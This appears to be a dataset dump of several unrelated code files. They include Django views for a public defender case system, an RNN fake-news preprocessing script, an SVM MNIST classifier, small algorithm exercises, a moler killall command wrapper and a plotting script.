NovaSuspeicaoForm\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_indeferimento_form.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'form': NovaSuspeicaoForm(atendimento=atendimento),\r\n 'form_id': 'SuspeicaoForm',\r\n 'form_action': reverse('indeferimento:nova_suspeicao'),\r\n })\r\n\r\n\r\n@login_required\r\ndef atendimento_indeferimento_negacao_procedimento_form(request, 
atendimento_numero):\r\n from indeferimento.forms import NovaNegacaoProcedimentoForm\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_indeferimento_form.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'form': NovaNegacaoProcedimentoForm(atendimento=atendimento),\r\n 'form_id': 'NegacaoProcedimentoForm',\r\n 'form_action': reverse('indeferimento:nova_negacao_procedimento'),\r\n })\r\n\r\n\r\n@login_required\r\ndef atendimento_indeferimento_negacao_form(request, atendimento_numero):\r\n \"\"\"Utilizado para a renderização da modal de Indeferimento dentro da página de Atendimento\"\"\"\r\n\r\n from indeferimento.forms import NovaNegacaoForm\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_indeferimento_form.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'form': NovaNegacaoForm(atendimento=atendimento),\r\n 'form_id': 'NegacaoForm',\r\n 'form_action': reverse('indeferimento:nova_negacao'),\r\n })\r\n\r\n\r\n@login_required\r\ndef atendimento_visualizacao_body(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_visualizacao_body.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n })\r\n\r\n\r\n@login_required\r\ndef listar_forma_atendimento_defensor(request):\r\n\r\n formasAtendimento = FormaAtendimento.objects.vigentes_defensor()\r\n\r\n arr = []\r\n for formaAtendimento in formasAtendimento:\r\n arr.append({\r\n 'id': formaAtendimento.id,\r\n 'nome': formaAtendimento.nome,\r\n })\r\n\r\n return JsonResponse(arr, safe=False)\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_atendimento')\r\ndef salvar_oficio(request, atendimento_numero):\r\n if request.is_ajax():\r\n dados = simplejson.loads(request.body)\r\n else:\r\n dados = request.POST\r\n\r\n if dados:\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n anotacao_oficio = AtendimentoDefensor.objects.create(\r\n origem=atendimento,\r\n inicial=atendimento.at_inicial,\r\n cadastrado_por=request.user.servidor,\r\n atendido_por=request.user.servidor,\r\n data_atendimento=datetime.now(),\r\n tipo=AtendimentoDefensor.TIPO_OFICIO,\r\n oficio=True,\r\n detalhes=atendimento.detalhes\r\n )\r\n\r\n if request.FILES:\r\n\r\n documento = AtendimentoDocumento(\r\n atendimento=anotacao_oficio,\r\n data_enviado=datetime.now(),\r\n enviado_por=request.user.servidor)\r\n\r\n form = DocumentoForm(request.POST, request.FILES, instance=documento)\r\n\r\n if form.is_valid():\r\n form.save()\r\n\r\n if hasattr(atendimento.at_inicial, 'arvore'):\r\n atendimento.at_inicial.arvore.ativo = False\r\n atendimento.at_inicial.arvore.save()\r\n\r\n if request.is_ajax():\r\n return JsonResponse({'success': True, 'anotacao': Util.object_to_dict(anotacao_oficio)})\r\n\r\n else:\r\n\r\n msg = 'Erro ao salvar oficio!'\r\n\r\n if request.is_ajax():\r\n return JsonResponse({'success': False, 'message': msg})\r\n else:\r\n messages.error(request, msg)\r\n\r\n if request.POST.get('next'):\r\n return redirect(request.POST['next'])\r\n else:\r\n return redirect('atendimento_atender', atendimento_numero)\r\n\r\n\r\nclass DocumentoAtendimentoGedViewSet(mixins.UpdateModelMixin,\r\n 
mixins.RetrieveModelMixin,\r\n mixins.ListModelMixin,\r\n DetailSerializerMixin,\r\n GenericViewSet):\r\n\r\n serializer_class = DocumentoAtendimentoSerializer\r\n queryset = DocumentoAtendimento.objects.all()\r\n serializer_detail_class = DocumentoAtendimentoSerializer\r\n permission_classes = [IsAuthenticated]\r\n\r\n def partial_update(self, request, *args, **kwargs):\r\n documento = DocumentoAtendimento.objects.get(id=kwargs['pk'])\r\n documento_ged = documento.documento_online\r\n defensoria = Defensoria.objects.get(id=request.data['defensoria'])\r\n documento_ged.assinaturas.filter(\r\n grupo_assinante=documento_ged.grupo_dono,\r\n ).update(\r\n grupo_assinante_nome=defensoria.nome,\r\n grupo_assinante=defensoria\r\n )\r\n documento_ged.grupo_dono = defensoria\r\n documento_ged.save()\r\n kwargs['partial'] = True\r\n return self.update(request, *args, **kwargs)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef listar_vulnerabilidades(request, atendimento_numero):\r\n vulnerabilidades = {\r\n 'json': {\r\n 'possui_vulnerabilidade': False,\r\n 'vulnerabilidade': []\r\n }\r\n }\r\n if request.is_ajax():\r\n data = request.body\r\n atendimento_id = data.decode(\"utf-8\")\r\n\r\n if settings.SIGLA_UF.upper() == 'AM':\r\n try:\r\n with connection.cursor() as cursor:\r\n cursor.callproc('vul_consultar', [request.user.id, 'SOLAR', atendimento_id])\r\n dados = cursor.fetchone()[0]\r\n vulnerabilidades = simplejson.loads(dados)\r\n except Exception as err:\r\n return JsonResponse({'error': str(err)}, status=500)\r\n else:\r\n lista_vulnerabilidades = TipoVulnerabilidade.objects.ativos().values('id', 'nome', 'descricao')\r\n vulnerabilidades_atendimento = list(\r\n AtendimentoVulnerabilidade.objects.filter(\r\n atendimento=atendimento_id,\r\n ).distinct().values_list('vulnerabilidade_id', flat=True)\r\n )\r\n for v in lista_vulnerabilidades:\r\n v['status'] = True if v['id'] in vulnerabilidades_atendimento else False\r\n v['vulnerabilidade_id'] = v['id']\r\n vulnerabilidades['json']['vulnerabilidade'].append(v)\r\n vulnerabilidades['json']['possui_vulnerabilidade'] = True if len(vulnerabilidades_atendimento) > 0 else False # noqa: E501\r\n\r\n vulnerabilidades['mensagem'] = config.MENSAGEM_VULNERABILIDADE_DIGITAL\r\n return JsonResponse(vulnerabilidades)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef salvar_vulnerabilidades(request, atendimento_numero):\r\n dados_vulnerabilidade = []\r\n response = {}\r\n status = None\r\n\r\n if request.is_ajax():\r\n data = simplejson.loads(request.body)\r\n atendimento_id = data['atendimento_id']\r\n\r\n dados_vulnerabilidade = [\r\n {\r\n 'status': vul['status'],\r\n 'vulnerabilidade_id': vul['vulnerabilidade_id']\r\n } for vul in data['vulnerabilidades']\r\n ]\r\n\r\n if settings.SIGLA_UF.upper() == 'AM':\r\n dados_vulnerabilidade = str(dados_vulnerabilidade).replace(\"'\", '\"')\r\n try:\r\n with connection.cursor() as cursor:\r\n cursor.callproc('vul_salvar', [request.user.id, 'SOLAR', atendimento_id, dados_vulnerabilidade])\r\n data = cursor.cursor.fetchone()[0]\r\n log_db = simplejson.loads(data)\r\n sucesso = log_db['sucesso'].upper() == \"S\"\r\n response = {'error': not sucesso, 'msg': log_db['motivo']}\r\n status = 500 if response['error'] else 200\r\n except Exception as err:\r\n response = {'error': True, 'msg': err}\r\n status = 500\r\n else:\r\n ids_vul_existentes = list(AtendimentoVulnerabilidade.objects.filter(\r\n atendimento_id=atendimento_id).values_list('vulnerabilidade_id', flat=True))\r\n\r\n for vul_atendimento in 
dados_vulnerabilidade:\r\n # se a vulnerabilidade está marcada e ainda não existir no banco, ela é adicionada\r\n if vul_atendimento['status'] and vul_atendimento['vulnerabilidade_id'] not in ids_vul_existentes:\r\n AtendimentoVulnerabilidade.objects.create(\r\n atendimento_id=atendimento_id,\r\n vulnerabilidade_id=vul_atendimento['vulnerabilidade_id']\r\n )\r\n # se a vulnerabilidade está desmarcada e existe no banco, é removida do banco\r\n elif not vul_atendimento['status'] and vul_atendimento['vulnerabilidade_id'] in ids_vul_existentes:\r\n AtendimentoVulnerabilidade.objects.filter(\r\n atendimento_id=atendimento_id,\r\n vulnerabilidade_id=vul_atendimento['vulnerabilidade_id']\r\n ).delete()\r\n response = {'error': False}\r\n status = 200\r\n return JsonResponse(response, status=status)\r\n\r\n\r\nclass PastaDocumentoViewSet(ModelViewSet):\r\n permission_classes = (permissions.IsAuthenticated,)\r\n queryset = PastaDocumento.objects.all()\r\n serializer_class = PastaDocumentoSerializer\r\n\r\n def perform_create(self, serializer):\r\n \"\"\"\r\n Atualiza o atendimento para inicial caso seja um atendimento de retorno\r\n \"\"\"\r\n atendimento_inicial = serializer.validated_data['atendimento'].inicial\r\n if atendimento_inicial:\r\n serializer.save(atendimento=atendimento_inicial)\r\n else:\r\n serializer.save()\r\n\r\n def get_queryset(self):\r\n queryset = self.queryset\r\n atendimento = self.request.query_params.get('atendimento')\r\n if not atendimento:\r\n return queryset\r\n atendimento = Atendimento.objects.filter(id=int(atendimento)).first()\r\n atendimento_inicial = atendimento.inicial or atendimento\r\n return queryset.filter(atendimento=atendimento_inicial)\r\n","repo_name":"SegurancaDPDF/SOLAR-Backend","sub_path":"atendimento/atendimento/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":248850,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35619268449","text":"import pandas as pd\nfrom nltk.corpus import stopwords\nimport re\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\n\nfake_df=pd.read_csv('input/Fake.csv')\ntrue_df=pd.read_csv('input/True.csv')\n\n# fake coded to 1\nfake_df[\"Label\"]=1\ntrue_df[\"Label\"]=0\n\ndf=pd.concat([fake_df,true_df],ignore_index=True)\n\n# create held out final\n# this set will not be used in any section of training or validation\ndf, hold = train_test_split(df, test_size = .1, random_state= 46, shuffle= True)\ndf = df.reset_index(drop = True)\nhold = hold.reset_index(drop = True)\n# write held out to data directory\nhold.to_csv('data/held_out.csv')\n\n# seperate label from features\nX=df.title.copy()\ny=df.Label.copy()\n\nstop_words = stopwords.words('english')\ndef clean(title):\n title = re.sub(\"U.S.|US|U.S|US.\", \"united states\", title)\n title =re.sub(\"[^a-zA-z]\",\" \", title) # removing expressions that are not word\n title=title.lower()\n title = title.split()\n title=\" \".join([word for word in title if not word in stop_words])\n return(title)\n\n\ndf[\"Cleaned\"]= list(map(clean, X))\n\nX=df.Cleaned\n\n# split train and test set\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=46,shuffle=True)\n\n# define embedings\nmax_lenght=100\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(X_train)\nword_index = tokenizer.word_index # creating word dict for words 
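This news-classifier record ends just below, right after tokenising and padding the titles; a hedged sketch of a small model that would consume the X_train_padded it produces — layer sizes and epoch count are illustrative, not from the source, and the misspelled identifier `max_lenght` is kept as the source defines it:

from tensorflow.keras import Sequential
from tensorflow.keras.layers import Bidirectional, Dense, Embedding, LSTM

model = Sequential([
    Embedding(vocab_size, embedding_dim, input_length=max_lenght),
    Bidirectional(LSTM(32)),
    Dense(1, activation='sigmoid'),   # label: 1 = fake, 0 = true
])
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(X_train_padded, y_train, validation_data=(X_test_padded, y_test), epochs=3)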
in training\nsequences = tokenizer.texts_to_sequences(X_train) # replacing words with the number corresponding to them in the dictionary(word_index)\nX_train_padded = pad_sequences(sequences, padding='post',maxlen=max_lenght) # padding words\nX_test_sequences = tokenizer.texts_to_sequences(X_test)\nX_test_padded = pad_sequences(X_test_sequences,padding=\"post\",maxlen=max_lenght)\nvocab_size = len(tokenizer.word_index)+1\nembedding_dim=16\n","repo_name":"gperrett/news-classifier","sub_path":"scripts/rnn_pipeline.py","file_name":"rnn_pipeline.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22465101270","text":"import sys\r\nfrom cx_Freeze import setup, Executable\r\n\r\nbuild_exe_options = {'include_files': ['data'], \"excludes\": [\"tkinter\"]}\r\n\r\n\r\nsetup(\r\n name ='Urban_Champion',\r\n author='rdn',\r\n version = '1.0',\r\n options={'build_exe': build_exe_options},\r\n executables = [Executable('urban_champion.py', base = 'Win32GUI',icon = None)])\r\n\r\n\r\n\r\n\r\n#in command line(cmd) change to current directory(cd) and write: \"setup.py build\" or \"setup.py build_exe\"\r\n","repo_name":"raytomely/Urban-Champion-remake","sub_path":"urban_champion_source/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13660072148","text":"#!/usr/bin/python3\n# Một xâu ký tự số chỉ bao gồm các chữ số 6 và 8 sẽ được gọi là “phát lộc” nếu thỏa mãn các điều kiện sau:\n# Độ dài xâu ít nhất là 6\n# Chữ số đầu tiên là chữ số 8, chữ số cuối cùng là chữ số 6\n# Không có 2 chữ số 8 nào ở cạnh nhau\n# Không có nhiều hơn 3 chữ số 6 ở cạnh nhau.\n# Viết chương trình liệt kê các xâu ký tự phát lộc độ dài N theo thứ tự tăng dần.\n# Input\n# Chỉ có 1 dòng ghi số N (5 < N < 16).\n# Output\n# Ghi ra các xâu ký tự phát lộc độ dài N, mỗi xâu trên một dòng.\n# Ví dụ\n# Input\n# 6\n# Output\n# 866686\n# 866866\n# 868666\n# 868686\n\ndef main():\n ln = int(input())\n if ln < 6:\n return\n def backtrack(cur):\n if len(cur) == ln:\n print(cur)\n return\n choices = ['6','8']\n if len(cur) == 0 or (len(cur) >= 3 and cur[-3:] == '666'):\n choices = ['8']\n elif len(cur) == ln-1 or cur[-1] == '8':\n choices = ['6']\n for i in choices:\n backtrack(cur + i)\n backtrack(\"\")\nmain()","repo_name":"ptit-mo/code","sub_path":"dsa/DSA01026_phat_loc.py","file_name":"DSA01026_phat_loc.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9147938852","text":"# Standard scientific Python imports\nimport time\nimport datetime as dt\n\n# Import datasets, classifiers and performance metrics\nimport scipy\nfrom sklearn import datasets, svm, metrics\n# fetch original mnist dataset\nfrom sklearn.datasets import fetch_mldata\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n\n# Standard scientific Python imports\nfrom matplotlib.colors import Normalize\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport datetime as dt\nimport csv\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\n\n\ndef main():\n # pick random indexes from 0 to size of our dataset\n\n # ---------------- classification begins -----------------\n # scale data for [0,255] -> [0,1]\n # sample smaller size 
for testing\n # rand_idx = np.random.choice(images.shape[0],10000)\n # X_data =images[rand_idx]/255.0\n # Y = targets[rand_idx]\n\n # full dataset classification\n # split data to train and test\n # from sklearn.cross_validation import train_test_split\n server_address = (\"\", 8000)\n httpd = HTTPServer(server_address, CGIHTTPRequestHandler)\n httpd.serve_forever()\n\n all_variables = scipy.io.loadmat('data_MNIST.mat')\n X_test = np.array(all_variables['Xtest'])\n X_train = np.array(all_variables['Xtrain'])\n y_test = np.array(all_variables['ytest'])\n y_train = np.array(all_variables['ytrain'])\n show_some_digits(X_test, y_test)\n\n ############### Classification with grid search ##############\n # If you don't want to wait, comment this section and uncommnet section below with\n # standalone SVM classifier\n\n # Warning! It takes really long time to compute this about 2 days\n\n # Create parameters grid for RBF kernel, we have to set C and gamma\n\n # generate matrix with all gammas\n # [ [10^-4, 2*10^-4, 5*10^-4],\n # [10^-3, 2*10^-3, 5*10^-3],\n # ......\n # [10^3, 2*10^3, 5*10^3] ]\n # gamma_range = np.outer(np.logspace(-4, 3, 8),np.array([1,2, 5]))\n\n gamma_range = np.outer(np.logspace(-3, 0, 4), np.array([1, 5]))\n gamma_range = gamma_range.flatten()\n\n # generate matrix with all C\n C_range = np.outer(np.logspace(-1, 1, 3), np.array([1, 5]))\n # flatten matrix, change to 1D numpy array\n C_range = C_range.flatten()\n\n parameters = {'kernel': ['rbf'], 'C': C_range, 'gamma': gamma_range}\n\n svm_clsf = svm.SVC()\n grid_clsf = GridSearchCV(estimator=svm_clsf, param_grid=parameters, n_jobs=1, verbose=2)\n\n print('Время начала поиска параметров {}'.format(str(dt.datetime.now())))\n\n grid_clsf.fit(X_train, y_train)\n\n print('Время окончания поиска параметров {}'.format(str(dt.datetime.now())))\n sorted(grid_clsf.cv_results_.keys())\n\n classifier = grid_clsf.best_estimator_\n params = grid_clsf.best_params_\n\n scores = grid_clsf.cv_results_['mean_test_score'].reshape(len(C_range),\n len(gamma_range))\n print(scores)\n plot_param_space_scores(scores, C_range, gamma_range)\n plot_param_space_scores_1(scores, C_range, gamma_range)\n\n for x in range(6):\n for y in range(8):\n print(\"c:\", C_range[x], \", gamma:\", gamma_range[y], \", score:\", scores[x][y])\n\n ######################### end grid section #############\n\n # Now predict the value of the test\n expected = y_test\n print('Время начала классификации 10000 символов {}'.format(str(dt.datetime.now())))\n predicted = classifier.predict(X_test)\n print('Время окончанияа классификации 10000 символов {}'.format(str(dt.datetime.now())))\n\n show_some_digits(X_test, predicted, title_text=\"Predicted {}\")\n\n print(\"Отчет для классификатора %s:\\n%s\\n\"\n % (classifier, metrics.classification_report(expected, predicted)))\n\n cm = metrics.confusion_matrix(expected, predicted)\n print(\"Матрица совпадений:\\n%s\" % cm)\n\n plot_confusion_matrix(cm)\n\n print(\"Точность={}\".format(metrics.accuracy_score(expected, predicted)))\n\n plt.show()\n\n\ndef show_some_digits(images, targets, sample_size=24, title_text='Digit {}'):\n '''\n Visualize random digits in a grid plot\n images - array of flatten gidigs [:,784]\n targets - final labels\n '''\n nsamples = sample_size\n rand_idx = np.random.choice(images.shape[0], nsamples)\n images_and_labels = list(zip(images[rand_idx], targets[rand_idx]))\n\n img = plt.figure(1, figsize=(15, 12), dpi=160)\n for index, (image, label) in enumerate(images_and_labels):\n 
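# Hedged aside: recent Matplotlib releases reject non-integer subplot positions,
# so the np.ceil(...) in the subplot call just below would need an int() cast, e.g.:
#     plt.subplot(int(np.ceil(nsamples / 6.0)), 6, index + 1)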
plt.subplot(np.ceil(nsamples / 6.0), 6, index + 1)\n plt.axis('off')\n # each image is flat, we have to reshape to 2D array 28x28-784\n plt.imshow(image.reshape(28, 28), cmap=plt.cm.gray_r, interpolation='nearest')\n plt.title(title_text.format(label))\n\n\ndef plot_confusion_matrix(cm, title='Confusion matrix', cmap=plt.cm.Blues):\n \"\"\"\n Plots confusion matrix,\n\n cm - confusion matrix\n \"\"\"\n plt.figure(1, figsize=(15, 12), dpi=160)\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n plt.tight_layout()\n plt.ylabel('Исходные данные')\n plt.xlabel('Предсказанные данные')\n\n\nclass MidpointNormalize(Normalize):\n\n def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):\n self.midpoint = midpoint\n Normalize.__init__(self, vmin, vmax, clip)\n\n def __call__(self, value, clip=None):\n x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]\n return np.ma.masked_array(np.interp(value, x, y))\n\n\ndef plot_param_space_scores(scores, C_range, gamma_range):\n #\n # The score are encoded as colors with the hot colormap which varies from dark\n # red to bright yellow. As the most interesting scores are all located in the\n # 0.92 to 0.97 range we use a custom normalizer to set the mid-point to 0.92 so\n # as to make it easier to visualize the small variations of score values in the\n # interesting range while not brutally collapsing all the low score values to\n # the same color.\n\n # plt.figure(figsize=(8, 6))\n plt.figure(figsize=(2, 2))\n plt.subplots_adjust(left=.2, right=0.95, bottom=0.15, top=0.95)\n plt.imshow(scores, interpolation='nearest', cmap=plt.cm.jet)\n plt.xlabel('gamma')\n plt.ylabel('C')\n plt.colorbar()\n plt.xticks(np.arange(len(gamma_range)), gamma_range)\n plt.yticks(np.arange(len(C_range)), C_range)\n plt.title('Точность классификации')\n\n\ndef plot_param_space_scores_1(scores, C_range, gamma_range):\n data_names = gamma_range\n data_values = scores * 100\n\n dpi = 80\n fig = plt.figure(dpi=dpi, figsize=(1200 / dpi, 600 / dpi))\n mpl.rcParams.update({'font.size': 12})\n\n plt.title('Точность классификации в зависимости от параметров C и gamma')\n\n ax = plt.axes()\n ax.yaxis.grid(True, zorder=1)\n\n print(data_names)\n xs = range(len(data_names))\n print(xs)\n\n plt.bar([x - 0.38 for x in xs], data_values[0],\n width=0.15, color='darkgreen', label='C = %(C_range)1.1f' % {\"C_range\": C_range[0]},\n zorder=10)\n plt.bar([x - 0.23 for x in xs], data_values[1],\n width=0.15, color='green', label='C = %(C_range)1.1f' % {\"C_range\": C_range[1]},\n zorder=2)\n plt.bar([x - 0.08 for x in xs], data_values[2],\n width=0.15, color='limegreen', label='C = %(C_range)1.0f' % {\"C_range\": C_range[2]},\n zorder=2)\n\n plt.bar([x + 0.07 for x in xs], data_values[3],\n width=0.15, color='lime', label='C = %(C_range)1.0f' % {\"C_range\": C_range[3]},\n zorder=2)\n plt.bar([x + 0.22 for x in xs], data_values[4],\n width=0.15, color='greenyellow', label='C = %(C_range)1.0f' % {\"C_range\": C_range[4]},\n zorder=2)\n plt.bar([x + 0.37 for x in xs], data_values[5],\n width=0.15, color='yellow', label='C = %(C_range)1.0f' % {\"C_range\": C_range[5]},\n zorder=2)\n plt.xticks(xs, data_names)\n plt.xlabel('Значение параметра gamma')\n plt.ylabel('Точность, %')\n\n # fig.autofmt_xdate(rotation = 25)\n\n plt.legend(loc='upper right')\n fig.savefig('bars.png')\n\n\nif __name__ == \"__main__\": # If run as a script, create a test object\n 
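One hedged portability note on this script: the fetch_mldata import near its top was deprecated in scikit-learn 0.20 and removed in 0.22, and is in fact unused since the data comes from data_MNIST.mat; should downloading MNIST ever be wanted, the maintained replacement is fetch_openml — a sketch, not the author's code:

from sklearn.datasets import fetch_openml

# 70000 x 784 pixel matrix with string labels; scaled to [0, 1] as the
# commented-out sampling code near the top of the script intended.
X, y = fetch_openml('mnist_784', version=1, return_X_y=True, as_frame=False)
X = X / 255.0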
main()\n","repo_name":"darya-lap/svm_mnist_classification","sub_path":"svm_mnist_digit_classification-master/svm_RBF_classifier.py","file_name":"svm_RBF_classifier.py","file_ext":"py","file_size_in_byte":8544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8255248960","text":"# Preorder transverse tree\n\nclass Tree():\n def __init__(self, value, left = None, right = None):\n self.root = value\n self.left = left\n self.right = right\n\n\ndef preorder(tree):\n if tree == None:\n return\n print(tree.root)\n preorder(tree.left)\n preorder(tree.right)\n\ndef store(tree, list):\n if tree == None:\n list.append(None)\n else:\n list.append(tree.root)\n store(tree.left, list)\n store(tree.right, list)\n return list\n\n\n\nmytree = Tree(4)\nmytree.left = Tree(1)\nmytree.right=Tree(5)\nmytree.left.left = Tree(3)\nmytree.left.right = Tree(2)\n\npreorder(mytree)\nprint('-------------')\n\nprint(store(mytree, []))\n","repo_name":"smallfishxz/Practice_Algorithm","sub_path":"brownbag/Deserilize_BTree.py","file_name":"Deserilize_BTree.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31596198669","text":"# Project Euler Prob 66\n\"\"\"\n Consider quadratic Diophantine equations of the form:\n\n x^2 - Dy^2 = 1\n Find the value of D ≤ 1000 in minimal solutions of x for which \n the largest value of x is obtained.\n\n\"\"\"\ndef isprime(num):\n for n in range(2,int(num**1/2)+1):\n if num % n == 0:\n return False\n return True\n\ndef topower5(num):\n x = str(num)\n l = len(x)\n y = 0\n for i in range(0, l):\n xi = int(x[i])\n y = xi**5 + y\n if y == num:\n #print(num)\n return True\nxmax = 0\nfor D in range(1, 1000):\n for x in range(1, 1000):\n for y in range(1, 1000):\n E = x**2 - (D*y**2)\n if E == 1:\n if x > xmax:\n xmax = x\n #print(\"x=\",x,\"y=\",y, \"is a solution for D=\", D)\nprint(xmax)\n","repo_name":"makbar1/python","sub_path":"Python Project 1/prob66.py","file_name":"prob66.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40341329550","text":"# -*- coding: utf-8 -*-\n\"\"\"\nKillall command module.\n\"\"\"\n\n__author__ = 'Yeshu Yang'\n__copyright__ = 'Copyright (C) 2018, Nokia'\n__email__ = 'yeshu.yang@nokia.com'\n\nimport re\n\nfrom moler.cmd.unix.genericunix import GenericUnixCommand\nfrom moler.exceptions import CommandFailure\nfrom moler.exceptions import ParsingDone\n\n\nclass Killall(GenericUnixCommand):\n\n def __init__(self, connection, name, is_verbose=False, prompt=None, newline_chars=None, runner=None):\n super(Killall, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,\n runner=runner)\n self.is_verbose = is_verbose\n self.name = name\n self.ret_required = False\n\n def build_command_string(self):\n if self.is_verbose:\n cmd = \"{} {} {}\".format(\"killall\", \"-v\", self.name)\n else:\n cmd = \"{} {}\".format(\"killall\", self.name)\n return cmd\n\n def on_new_line(self, line, is_full_line):\n if is_full_line:\n try:\n self._parse_no_permit(line)\n self._parse_killall_verbose(line)\n except ParsingDone:\n pass\n return super(Killall, self).on_new_line(line, is_full_line)\n\n def _parse_no_permit(self, line):\n if self._regex_helper.search(r'(Operation not permitted)', line):\n self.set_exception(CommandFailure(self, \"ERROR: {}\".format(self._regex_helper.group(1))))\n raise 
ParsingDone\n\n _re_killall = re.compile(r\"Killed (?P[^\\(]+)\\((?P\\d+)\\) with signal\")\n\n def _parse_killall_verbose(self, line):\n if self.is_verbose:\n if self._regex_helper.search_compiled(Killall._re_killall, line):\n if \"Detail\" not in self.current_ret:\n self.current_ret[\"Detail\"] = dict()\n pid = self._regex_helper.group(\"Pid\")\n self.current_ret[\"Detail\"][pid] = self._regex_helper.group(\"Name\")\n raise ParsingDone\n\n\nCOMMAND_OUTPUT_no_verbose = \"\"\"\nPclinux90:~ # killall iperf\nPclinux90:~ # \"\"\"\n\nCOMMAND_KWARGS_no_verbose = {\"name\": \"iperf\"}\n\nCOMMAND_RESULT_no_verbose = {\n\n}\n\nCOMMAND_OUTPUT_no_process = \"\"\"\nPClinux110:/home/runner # killall tshark\ntshark: no process found\nPClinux110:/home/runner #\"\"\"\n\nCOMMAND_KWARGS_no_process = {\"name\": \"tshark\"}\n\nCOMMAND_RESULT_no_process = {\n\n}\n\nCOMMAND_OUTPUT_verbose = \"\"\"\nPclinux90:~ # killall -v iperf\nKilled iperf(15054) with signal 15\nPclinux90:~ # \"\"\"\n\nCOMMAND_KWARGS_verbose = {\n \"name\": \"iperf\",\n \"is_verbose\": True\n}\n\nCOMMAND_RESULT_verbose = {\n \"Detail\": {\"15054\": \"iperf\"}\n}\n","repo_name":"nokia/moler","sub_path":"moler/cmd/unix/killall.py","file_name":"killall.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"78"} +{"seq_id":"36939751861","text":"'''\nCreated on 08.03.2020\n\n@author: 49157\n'''\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport datetime as dt\nimport numpy as np\nimport pylab as pl\n\nlogdir = os.path.join(os.getcwd(),'sim_results')\nfilepath_log = os.path.join(logdir,'log_complete.csv')\nfilepath_forecast = os.path.join(logdir,'kpi_forecast_complete.csv')\nfilepath_control = os.path.join(logdir,'kpi_control_complete.csv')\n\ndf_log = pd.read_csv(filepath_log, sep=';', decimal=',', index_col='time')\ndf_log.index = pd.to_datetime(df_log.index)\n\ndf_c = pd.read_csv(filepath_control, sep=';', decimal='.', index_col = 'start')\ndf_c.index = pd.to_datetime(df_c.index)\n\ndf_f = pd.read_csv(filepath_forecast, sep=';', decimal='.', index_col = 'time')\ndf_f.index = pd.to_datetime(df_f.index)\n\n\n''' ---------- forecast evaluation - boxplots ----------'''\n\nfig = pl.figure()\nax = pl.axes()\nfor i in range(10):\n month = df_f.loc[dt.datetime(2018,2+i,1):dt.datetime(2018,3+i,1)]\n pl.boxplot(month['2h_median'].get_values(), positions = [i+1], showfliers = False)\n\nmonth = df_f.loc[dt.datetime(2018,12,1):dt.datetime(2018,12,31)]\npl.boxplot(month['2h_median'].get_values(), positions = [11], showfliers = False)\n \nax.set_xticklabels(['Feb', 'Mar', 'Apr', 'Mai','Jun','Jul','Aug','Sep','Oct','Nov','Dez'])\npl.grid()\npl.ylim([-.7,.7])\npl.title('forecast-KPI during the next two hours') \n\n\nfig = pl.figure()\nax = pl.axes()\nfor i in range(10):\n month = df_f.loc[dt.datetime(2018,2+i,1):dt.datetime(2018,3+i,1)]\n pl.boxplot(month['24h_median'].get_values(), positions = [i+1], showfliers = False)\n\nmonth = df_f.loc[dt.datetime(2018,12,1):dt.datetime(2018,12,31)]\npl.boxplot(month['24h_median'].get_values(), positions = [11], showfliers = False)\n \nax.set_xticklabels(['Feb', 'Mar', 'Apr', 'Mai','Jun','Jul','Aug','Sep','Oct','Nov','Dez'])\npl.grid()\npl.ylim([-.7,.7])\npl.title('forecast-KPI during the next 24 hours')\n\n\n\n''' ---------- control evaluation ----------'''\nplt.figure(3)\nplt.title('evaluation - control')\ncsv_mean = 